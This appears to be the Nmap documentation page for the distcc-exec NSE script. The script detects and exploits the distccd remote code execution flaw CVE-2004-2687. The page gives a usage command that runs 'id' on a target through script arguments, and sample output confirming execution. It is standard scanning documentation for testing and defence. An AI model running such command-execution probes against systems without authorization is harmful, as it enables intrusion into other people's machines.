Categories: exploit, intrusive, vuln
Detects and exploits a remote code execution vulnerability in the distributed compiler daemon distcc. The vulnerability was disclosed in 2002, but is still present in modern implementation due to poor configuration of the service.
the command to run at the remote server
- vulns.short, vulns.showall
See the documentation for the vulns library.
nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"
PORT STATE SERVICE 3632/tcp open distccd | distcc-exec: | VULNERABLE: | distcc Daemon Command Execution | State: VULNERABLE (Exploitable) | IDs: CVE:CVE-2004-2687 | Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C) | Description: | Allows executing of arbitrary commands on systems running distccd 3.1 and | earlier. The vulnerability is the consequence of weak service configuration. | | Disclosure date: 2002-02-01 | Extra information: | | uid=118(distccd) gid=65534(nogroup) groups=65534(nogroup) | | References: | https://distcc.github.io/security.html | https://nvd.nist.gov/vuln/detail/CVE-2004-2687 |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687
License: Same as Nmap--See https://nmap.org/book/man-legal.html